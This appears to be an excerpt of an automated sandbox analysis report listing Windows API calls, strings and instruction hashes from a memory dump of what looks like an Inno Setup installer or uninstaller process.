                                                            • SendMessageW.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8414
                                                            • SendMessageA.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8433
                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 005B8442
                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 005B8453
                                                            • SendMessageW.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8473
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: MessageSendWindow$ProcessThread$CaptureUnicode
                                                            • String ID:
                                                            • API String ID: 1994056952-0
                                                            • Opcode ID: 55dc5321dd5b36b01ea5e2a5a29a5f1f208dbc338f676538c3849fa0211c3caa
                                                            • Instruction ID: fa2d834c3aada0f77e9407d785ac3e39b975c7e98aa55159218471e4f58a832a
                                                            • Opcode Fuzzy Hash: 55dc5321dd5b36b01ea5e2a5a29a5f1f208dbc338f676538c3849fa0211c3caa
                                                            • Instruction Fuzzy Hash: 3C21BFB520460A6F9A60EA99CD40EE777DCFF44744B105829B999C3642DE14F840C765
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 833c993916d0d18284627c8ebcb851e0d3f6b00a19ef6d1fc725f28c20042ba8
                                                            • Instruction ID: 5d66737b0d4da92f98c0db807105cf356bd4b4b1c4874a50b8b8aa415a59ee3b
                                                            • Opcode Fuzzy Hash: 833c993916d0d18284627c8ebcb851e0d3f6b00a19ef6d1fc725f28c20042ba8
                                                            • Instruction Fuzzy Hash: D1C134A2710A004BD714AB7D9C8476FB286DBC5324F19823FE645EB3D6DA7CCC558B88
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00615941
                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00615968
                                                            • SetForegroundWindow.USER32(?,00000000,00615C40,?,00000000,00615C7E), ref: 00615979
                                                            • DefWindowProcW.USER32(00000000,?,?,?,00000000,00615C40,?,00000000,00615C7E), ref: 00615C2B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: MessagePostWindow$ForegroundProc
                                                            • String ID: ,hm$Cannot evaluate variable because [Code] isn't running yet
                                                            • API String ID: 602442252-4088602279
                                                            • Opcode ID: 2bb3247fdb15e1dc09ebdb3d21175550fc0efe1a06f4ab558686e93eab2b52db
                                                            • Instruction ID: a4d9e41ba68ff62660f6698438dd6fdd69331843db6522f8d42236939986de27
                                                            • Opcode Fuzzy Hash: 2bb3247fdb15e1dc09ebdb3d21175550fc0efe1a06f4ab558686e93eab2b52db
                                                            • Instruction Fuzzy Hash: F691BC34A04704EFD711DF69D8A1F99FBB6EB89700F19C4AAF8059B7A1C634AD80CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0060D996
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: PrivateProfileStringWrite
                                                            • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                            • API String ID: 390214022-3304407042
                                                            • Opcode ID: 8acf262c293dccebf8fb0b98e1716e204ebc77ac4caf48964dd87ce58af5a374
                                                            • Instruction ID: 9ccae61fee5444c96898e798bd08ad00ad1f0a42c005b5ee0ec7678d9f590d11
                                                            • Opcode Fuzzy Hash: 8acf262c293dccebf8fb0b98e1716e204ebc77ac4caf48964dd87ce58af5a374
                                                            • Instruction Fuzzy Hash: 3E810974A44209AFDB04EBE5C882BDEBBB6EF88304F504669E400B73D1E775AE45CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 004092D8: GetCurrentThreadId.KERNEL32 ref: 004092DB
                                                            • GetTickCount.KERNEL32 ref: 00408E4F
                                                            • GetTickCount.KERNEL32 ref: 00408E67
                                                            • GetCurrentThreadId.KERNEL32 ref: 00408E96
                                                            • GetTickCount.KERNEL32 ref: 00408EC1
                                                            • GetTickCount.KERNEL32 ref: 00408EF8
                                                            • GetTickCount.KERNEL32 ref: 00408F22
                                                            • GetCurrentThreadId.KERNEL32 ref: 00408F92
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CountTick$CurrentThread
                                                            • String ID:
                                                            • API String ID: 3968769311-0
                                                            • Opcode ID: 20bc9faa338205b9676b9ce63f6a6fc95d4e340ef3c4d15d54fbfb65282f0910
                                                            • Instruction ID: 216a2c916ba6e2f13aacbc2b486a5202febe2ca6ab096472d485461ede499aa8
                                                            • Opcode Fuzzy Hash: 20bc9faa338205b9676b9ce63f6a6fc95d4e340ef3c4d15d54fbfb65282f0910
                                                            • Instruction Fuzzy Hash: FD4171712087429ED721AF78CA4031FBAD2AF94354F15897EE4D9D72C2DB7C9881874A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • PeekMessageW.USER32 ref: 005B8604
                                                            • IsWindowUnicode.USER32 ref: 005B8618
                                                            • PeekMessageW.USER32 ref: 005B863B
                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 005B8651
                                                            • TranslateMessage.USER32 ref: 005B86D6
                                                            • DispatchMessageW.USER32 ref: 005B86E3
                                                            • DispatchMessageA.USER32 ref: 005B86EB
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
                                                            • String ID:
                                                            • API String ID: 2190272339-0
                                                            • Opcode ID: 0c3374f57e659fab6af93a213fc217c082f6b8d0dd5b2fa1f367d4961ec17b25
                                                            • Instruction ID: 67b3953643da56f9c200822127d0531685f000c00b35d7cfb42a732a483186e2
                                                            • Opcode Fuzzy Hash: 0c3374f57e659fab6af93a213fc217c082f6b8d0dd5b2fa1f367d4961ec17b25
                                                            • Instruction Fuzzy Hash: 4921D83034478065EA312D2A1C15BFE9FDD6FF1B49F14545EF58197282CEA9F846C21E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetActiveWindow.USER32 ref: 005C92F7
                                                            • GetFocus.USER32 ref: 005C92FF
                                                            • RegisterClassW.USER32 ref: 005C9320
                                                            • ShowWindow.USER32(00000000,00000008,00000000,?,00000000,4134A000,00000000,00000000,00000000,00000000,80000000,00000000,?,00000000,00000000,00000000), ref: 005C93B8
                                                            • SetFocus.USER32(00000000,00000000,005C93DA,?,?,00000000,00000001,00000000,?,00624EAB,006D579C,?,00000000,006B9450,?,00000001), ref: 005C93BF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: FocusWindow$ActiveClassRegisterShow
                                                            • String ID: TWindowDisabler-Window
                                                            • API String ID: 495420250-1824977358
                                                            • Opcode ID: 6784ae0ba7057f0a8a26c4c85bfb57be43722a071822028f1ce80f015718ad1f
                                                            • Instruction ID: 15dfa4f4c92537cee7ed1e4bf608ea9bac44f034fc845b592ccaf34af6f1c1de
                                                            • Opcode Fuzzy Hash: 6784ae0ba7057f0a8a26c4c85bfb57be43722a071822028f1ce80f015718ad1f
                                                            • Instruction Fuzzy Hash: 1321E570A41700AFD710EBA59C56F5ABBA5FB85B00F51452DF900EB6D1EB78AC40C7D8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F30
                                                            • GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F49
                                                            • CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F73
                                                            • CloseHandle.KERNEL32(00000000), ref: 006A5F91
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: FileHandle$AttributesCloseCreateModule
                                                            • String ID: GetFinalPathNameByHandleW$kernel32.dll
                                                            • API String ID: 791737717-340263132
                                                            • Opcode ID: 63661d9c3d23cef5f130baae9d767e1c6f1063135154e27a41ef4511c69c9237
                                                            • Instruction ID: 33e75e3eedf917459a19461fb92274fc6dcf6f547d9e1cd84d4496d1484fa6be
                                                            • Opcode Fuzzy Hash: 63661d9c3d23cef5f130baae9d767e1c6f1063135154e27a41ef4511c69c9237
                                                            • Instruction Fuzzy Hash: FD110860740B043FE530B17A5C8BFBB204E8B96769F14013ABB1ADA3C2E9799D410D9A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00408BC9
                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00408BCF
                                                            • GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 00408BEB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: AddressErrorHandleLastModuleProc
                                                            • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                            • API String ID: 4275029093-79381301
                                                            • Opcode ID: d2b5bb259a4a67909b9857f382d53dc443368d34a06db9e148c60c099e14fc22
                                                            • Instruction ID: fae384035c4cbf403bb6e842233c038de7d928fc1d1ef8a2a4529768a9174d83
                                                            • Opcode Fuzzy Hash: d2b5bb259a4a67909b9857f382d53dc443368d34a06db9e148c60c099e14fc22
                                                            • Instruction Fuzzy Hash: E4117570D05208AEEF10EBA5DA45A6EB7F4DB44704F1084BFE454B72C1DF7D8A548B29
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 005CE27D
                                                              • Part of subcall function 004EE238: EnterCriticalSection.KERNEL32(?,00000000,004EE4A7,?,?), ref: 004EE280
                                                            • SelectObject.GDI32(00000001,00000000), ref: 005CE29F
                                                            • GetTextExtentPointW.GDI32(00000001,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,?), ref: 005CE2B3
                                                            • GetTextMetricsW.GDI32(00000001,?,00000000,005CE2F8,?,00000000,?,0068D5D0,00000001), ref: 005CE2D5
                                                            • ReleaseDC.USER32 ref: 005CE2F2
                                                            Strings
                                                            • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 005CE2AA
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Text$CriticalEnterExtentMetricsObjectPointReleaseSectionSelect
                                                            • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                            • API String ID: 1334710084-222967699
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0060F6D8: GetCurrentProcess.KERNEL32(00000028), ref: 0060F6E8
                                                              • Part of subcall function 0060F6D8: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0060F6EE
                                                            • SetForegroundWindow.USER32(?), ref: 006B817A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Process$CurrentForegroundOpenTokenWindow
                                                            • String ID: %hm$(\m$Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.$bm
                                                            • API String ID: 3179053593-36556386
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
                                                            • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
                                                            • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: FileHandleWrite
                                                            • String ID: Error$Runtime error at 00000000
                                                            • API String ID: 3320372497-2970929446
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004317D1
                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004317ED
                                                            • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00431826
                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004318A3
                                                            • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004318BC
                                                            • VariantCopy.OLEAUT32(?,?), ref: 004318F7
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                            • String ID:
                                                            • API String ID: 351091851-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 006AE714
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,006B78BD,00000000,006B81F9), ref: 006AE743
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 006AE758
                                                            • SetWindowLongW.USER32 ref: 006AE77F
                                                            • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 006AE798
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 006AE7B9
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Window$Long$Show
                                                            • String ID:
                                                            • API String ID: 3609083571-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • Sleep.KERNEL32(00000000,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405ABB
                                                            • Sleep.KERNEL32(0000000A,00000000,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405AD1
                                                            • Sleep.KERNEL32(00000000,00000000,?,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405AFF
                                                            • Sleep.KERNEL32(0000000A,00000000,00000000,?,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405B15
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4A1
                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CloseCreateFileHandle
                                                            • String ID: .tmp$Gtk$_iu
                                                            • API String ID: 3498533004-1320520068
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 005B8250: SetWindowTextW.USER32(?,00000000), ref: 005B8281
                                                            • ShowWindow.USER32(?,00000005,00000000,006B8C4E,?,?,00000000), ref: 006B89DE
                                                              • Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F
                                                              • Part of subcall function 00424020: SetCurrentDirectoryW.KERNEL32(00000000,?,006B8A06,00000000,006B8C15,?,?,00000005,00000000,006B8C4E,?,?,00000000), ref: 0042402B
                                                              • Part of subcall function 005C6FB0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005C7045,?,?,?,00000001,?,0061037E,00000000,006103E9), ref: 005C6FE5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                            • String ID: .dat$.msg$IMsg$Uninstall
                                                            • API String ID: 3312786188-1660910688
                                                            • Opcode ID: 87cec6a378dec6b032675d7c559790f2158faaa0e8ad7578a241a316ddb9e1cc
                                                            • Instruction ID: 43941ce92546cf1f75effb4615d96ab71b8b1f254b2d248514a95b56d5af6042
                                                            • Opcode Fuzzy Hash: 87cec6a378dec6b032675d7c559790f2158faaa0e8ad7578a241a316ddb9e1cc
                                                            • Instruction Fuzzy Hash: 65415CB0A002059FC700EFA4CD96E9EBBB6FB88304F51846AF400A7751DB75AE41DFA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000B06,00000000,00000000), ref: 006153C6
                                                            • SendMessageW.USER32(00000000,00000B00,00000000,00000000), ref: 00615463
                                                            Strings
                                                            • Failed to create DebugClientWnd, xrefs: 0061542C
                                                            • hSa, xrefs: 00615415
                                                            • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 006153F2
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd$hSa
                                                            • API String ID: 3850602802-2905362044
                                                            • Opcode ID: 4e2498dae47c6d0870a5ab4103f59c6443b436741fa29bda88c5ce5a22a9ee1a
                                                            • Instruction ID: bd2b79d17f40968884fe1c372ced24de8c60c917dea0cb25488337d16b2a65e4
                                                            • Opcode Fuzzy Hash: 4e2498dae47c6d0870a5ab4103f59c6443b436741fa29bda88c5ce5a22a9ee1a
                                                            • Instruction Fuzzy Hash: 391123B1A403129FE300EB28DC81FDABBD69F94304F08002AF5858B3D2D3749C84C766
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • MsgWaitForMultipleObjects.USER32 ref: 00624AD6
                                                            • GetExitCodeProcess.KERNEL32 ref: 00624AF9
                                                            • CloseHandle.KERNEL32(?,00624B2C,00000001,00000000,000000FF,000004FF,00000000,00624B25), ref: 00624B1F
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                            • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                            • API String ID: 2573145106-3235461205
                                                            • Opcode ID: 361a62daa0bf1d295b617bedeb0d636d14927d9149230c5f986aec38bd004ab5
                                                            • Instruction ID: b445045a4a45572890d55b61ba1fda7f57045845c9b5a3357f52015174d7dfc9
                                                            • Opcode Fuzzy Hash: 361a62daa0bf1d295b617bedeb0d636d14927d9149230c5f986aec38bd004ab5
                                                            • Instruction Fuzzy Hash: CE01A234640605AFD710EFA8ED62E9977EAEB49721F200265F520D73D0DE74ED44CA19
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 004070E7
                                                            • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 004070ED
                                                            • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 004070FC
                                                            • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 0040710D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CurrentDirectory
                                                            • String ID: :
                                                            • API String ID: 1611563598-336475711
                                                            • Opcode ID: aa9707b4d0d9c5d03511b22bbefae7383822b12ede650e628390a7387f8948e9
                                                            • Instruction ID: 4e46778bef482c884a40b6a77bd37b1cdf5980326a29a022de95e28d89e8e0a5
                                                            • Opcode Fuzzy Hash: aa9707b4d0d9c5d03511b22bbefae7383822b12ede650e628390a7387f8948e9
                                                            • Instruction Fuzzy Hash: 71F0627154474465D310E7658852BDB729CDF84348F04843E76C89B2D1E6BC5948979B
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • Opcode ID: ad8bebb6b70c684c30d9747228a5e3f8ffc0963a0edfe972ae4d2d3d4fc87c04
                                                            • Instruction ID: f6f51fa323c2004b4ed4a12cf3aa4c02228d8e81e9c13bd86265522dc6499af0
                                                            • Opcode Fuzzy Hash: ad8bebb6b70c684c30d9747228a5e3f8ffc0963a0edfe972ae4d2d3d4fc87c04
                                                            • Instruction Fuzzy Hash: B01172A160425956FF706A7A6F09BEA3F9C7FD1745F050429BE419B283CB38CC458BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • DeleteFileW.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A30
                                                            • GetLastError.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A3F
                                                            • GetFileAttributesW.KERNEL32(00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000), ref: 00423A47
                                                            • RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000), ref: 00423A62
                                                            • SetLastError.KERNEL32(00000000,00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000), ref: 00423A70
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: ErrorFileLast$AttributesDeleteDirectoryRemove
                                                            • String ID:
                                                            • API String ID: 2814369299-0
                                                            • Opcode ID: 5cf6f583151de2db28f1a3568ac7f7c21abc363b183444b2113c2190a0e75535
                                                            • Instruction ID: b6ddb16581f5c3c7179c90d7d3f79c6d55466118c1baf1b24a27a0798ed1e7de
                                                            • Opcode Fuzzy Hash: 5cf6f583151de2db28f1a3568ac7f7c21abc363b183444b2113c2190a0e75535
                                                            • Instruction Fuzzy Hash: FAF0A7613803241999203DBE28C9ABF115CC9427AFB54077FF994D22D2D62D5F87415D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • UnhookWindowsHookEx.USER32(00000000), ref: 005B632E
                                                            • SetEvent.KERNEL32(00000000), ref: 005B635A
                                                            • GetCurrentThreadId.KERNEL32 ref: 005B635F
                                                            • MsgWaitForMultipleObjects.USER32 ref: 005B6388
                                                            • CloseHandle.KERNEL32(00000000,00000000), ref: 005B6395
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CloseCurrentEventHandleHookMultipleObjectsThreadUnhookWaitWindows
                                                            • String ID:
                                                            • API String ID: 2132507429-0
                                                            • Opcode ID: 3d70fa8801357980af144d8f96a13d0436440f37400d9bd4b324e4fa6e60107c
                                                            • Instruction ID: 777aa0f60006170efd8bf97b8faec0e2cbbea874aebe53a0ac6f8c30ff2fdbbe
                                                            • Opcode Fuzzy Hash: 3d70fa8801357980af144d8f96a13d0436440f37400d9bd4b324e4fa6e60107c
                                                            • Instruction Fuzzy Hash: 30018B70A09700EED700EB65DC45BAE37E9FB44715F604A2AF055C75D0DB38A480CB42
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(00000000,000000EC,00000000,006B9062,?,?,006D579C,?,006B9494,00000000,006B949E,?,00000000,006B94CE,?,?), ref: 006B8FD4
                                                            • SetFileAttributesW.KERNEL32(00000000,00000000,00000000,000000EC,00000000,006B9062,?,?,006D579C,?,006B9494,00000000,006B949E,?,00000000,006B94CE), ref: 006B8FFD
                                                            • MoveFileExW.KERNEL32(00000000,00000000,00000001,00000000,000000EC,00000000,006B9062,?,?,006D579C,?,006B9494,00000000,006B949E,?,00000000), ref: 006B9016
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: File$Attributes$Move
                                                            • String ID: isRS-%.3u.tmp
                                                            • API String ID: 3839737484-3657609586
                                                            • Opcode ID: f1af534764baa85caf1b981574ad6383839b7439e06e2967b69f80573a92c814
                                                            • Instruction ID: 31d351f3c97924346b89867796ea0414510024315a00da88274a448b23120628
                                                            • Opcode Fuzzy Hash: f1af534764baa85caf1b981574ad6383839b7439e06e2967b69f80573a92c814
                                                            • Instruction Fuzzy Hash: AB318170D04218ABCB00EBB9C8859EEB7B9EF48314F51467EF814B7281D7385E818769
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateProcessW.KERNEL32 ref: 0060C08C
                                                            • GetLastError.KERNEL32(00000000,00000000,006D579C,?,?,XMb,00000000,>Mb,?,00000000,00000000,0060C0B2,?,?,00000000,00000001), ref: 0060C094
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CreateErrorLastProcess
                                                            • String ID: >Mb$XMb
                                                            • API String ID: 2919029540-2660256435
                                                            • Opcode ID: cc071ed51034117dff2eb24da789fdfe7696ce97c15fb88c7d50c2d671ecce20
                                                            • Instruction ID: 6fed8a1d79b3fe7fb7c31d778b9d5703ccb9eb2a1393ada51090ba1ca1dee2d9
                                                            • Opcode Fuzzy Hash: cc071ed51034117dff2eb24da789fdfe7696ce97c15fb88c7d50c2d671ecce20
                                                            • Instruction Fuzzy Hash: DA113972640208AFCB54DFA9DC81DDFB7ECEB4D320B518666F908D3280D635AE108BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateProcessW.KERNEL32 ref: 006B6A05
                                                            • CloseHandle.KERNEL32(006B6AB0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,006B6A6C,?,006B6A5C,00000000), ref: 006B6A22
                                                              • Part of subcall function 006B68EC: GetLastError.KERNEL32(00000000,006B6989,?,?,?), ref: 006B690F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CloseCreateErrorHandleLastProcess
                                                            • String ID: (\m$D
                                                            • API String ID: 3798668922-1981685662
                                                            • Opcode ID: a5833d7c80436315819c56a95c2be4cf65ccd9a37b43d1b18280e5cc74a4d4a7
                                                            • Instruction ID: 5a29f4a3f67f8962990b16f59edcecd6c92ec2fdb2b6e45770094aa6b13b7383
                                                            • Opcode Fuzzy Hash: a5833d7c80436315819c56a95c2be4cf65ccd9a37b43d1b18280e5cc74a4d4a7
                                                            • Instruction Fuzzy Hash: 53115EB1604248AFDB00EBA5CC92EEE77ADEF08704F51407AF505F7281E678AE448768
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

